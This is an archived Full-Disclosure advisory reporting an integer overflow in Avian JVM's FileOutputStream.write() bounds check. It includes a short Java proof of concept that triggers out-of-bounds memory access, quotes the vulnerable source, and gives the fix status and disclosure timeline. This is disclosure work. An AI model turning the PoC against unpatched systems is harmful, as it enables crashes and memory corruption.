lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 11 Nov 2020 10:52:59 +0000
From: Pietro Oliva via Fulldisclosure <>
To: "" <>
Subject: [FD] Avian JVM FileOutputStream.write() Integer Overflow

Vulnerability title: Avian JVM FileOutputStream.write() Integer Overflow
Author: Pietro Oliva
Vendor: ReadyTalk
Product: Avian JVM 
Affected version: 1.2.0 before 27th October 2020
Fixed Version: 1.2.0 since 27th October 2020

The issue is located in the FileOutputStream.write() method defined in, where a boundary check is performed in order to prevent
out-of-bounds memory read/write. However, this check contained an integer 
overflow which leads to the same check being bypassed and out-of-bounds 

Attackers could exploit this vulnerability to read/write arbitrary content in
the JVM memory. This could in turn result in denial of service, memory 
disclosure, or arbitrary code execution in the context of the JVM.

The following PoC would trigger an OOB read/write and/or crash of Avian JVM:


public class poc {

  public static void main(String[] args) throws IOException {
      byte[] data = "somedata".getBytes();
      FileDescriptor fd = new FileDescriptor().out;
      FileOutputStream fos = new FileOutputStream(fd);

      fos.write(data, 1, 0x7fffffff); // Integer overflow + OOB read/write here


public void write(byte[] b, int offset, int length) throws IOException {
  if (b == null) {
    throw new NullPointerException();

  if (offset < 0 || offset + length > b.length) { // Integer overflow here
    throw new ArrayIndexOutOfBoundsException();

  write(fd, b, offset, length);

    Java_java_io_FileOutputStream_write__I_3BII(JNIEnv* e,
                                                jint fd,
                                                jbyteArray b,
                                                jint offset,
                                                jint length)
  jbyte* data = static_cast<jbyte*>(malloc(length));

  if (data == 0) {
    throwNew(e, "java/lang/OutOfMemoryError", 0);

  e->GetByteArrayRegion(b, offset, length, data);
  if (not e->ExceptionCheck()) {
    doWrite(e, fd, data, length);


void JNICALL GetByteArrayRegion(Thread* t,
                                jbyteArray array,
                                jint offset,
                                jint length,
                                jbyte* dst)
  ENTER(t, Thread::ActiveState);

  if (length) {
    // Out-of-bounds read/write here
    memcpy(dst, &(*array)->body()[offset], length * sizeof(jbyte));

As can be observed above, offset+length can overflow in FileOutputStream.write()
and later result in OOB read/write during memcpy() in GetByteArrayRegion().   

Mitigating factors:
Since offset needs to be a positive integer, and length is limited to a valid
malloc argument, there is a limited range of memory where an attacker could read
or write as a result of this vulnerability.


A fix has been made available with the following commit:

Disclosure timeline:
20th October 2020  -  Vulnerability reported.
20th October 2020  -  Vulnerability acknowledged.
20th October 2020  -  CVE request sent to Mitre.
23rd October 2020  -  Sent reminder to Mitre.
27th October 2020  -  Sent reminder to Mitre.
27th October 2020  -  Patch proposed via pull request.
27th October 2020  -  Patch merged into master branch.
29th October 2020  -  Sent reminder to Mitre.
2nd November 2020  -  CVE request sent again to Mitre.
11th November 2020  - Vulnerability details shared on fulldisclosure without CVE identifier.

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists